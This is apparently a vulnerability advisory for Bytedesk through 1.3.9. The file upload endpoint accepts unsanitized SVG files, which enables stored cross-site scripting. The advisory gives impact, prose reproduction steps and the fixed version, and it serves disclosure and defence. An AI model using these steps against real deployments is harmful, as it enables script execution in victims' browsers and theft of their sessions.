Bytedesk Unrestricted SVG File Upload Vulnerability Allowing Stored Cross-Site Scripting

A vulnerability exists in Bytedesk versions through 1.3.9, allowing unrestricted upload of SVG files via the authenticated endpoint POST /api/v1/upload/file. The server's file type validation permits image/svg+xml, but fails to sanitize the contents before storage. This flaw enables an attacker to upload a malicious SVG containing JavaScript, which is executed when the file is accessed, resulting in stored cross-site scripting. The vulnerability has been assigned CVE-2026-3748.

Impact

Exploitation of this vulnerability allows for unrestricted file uploads of dangerous types, specifically SVG files that can contain embedded scripts. This leads to stored cross-site scripting, where the uploaded malicious script is executed in the context of the user who accesses the file.

Reproduction

To reproduce this vulnerability, upload a file through the /api/v1/upload/file endpoint using a valid authorization token. The file must be an SVG containing a script tag with JavaScript, such as one that triggers an alert. Once uploaded, the file can be accessed via the provided URL, which will execute the embedded script in the user's browser.

Remediation

Users are advised to upgrade to Bytedesk version 1.4.5.1, which addresses this vulnerability. The update is available as a Docker image or as a downloadable zip file.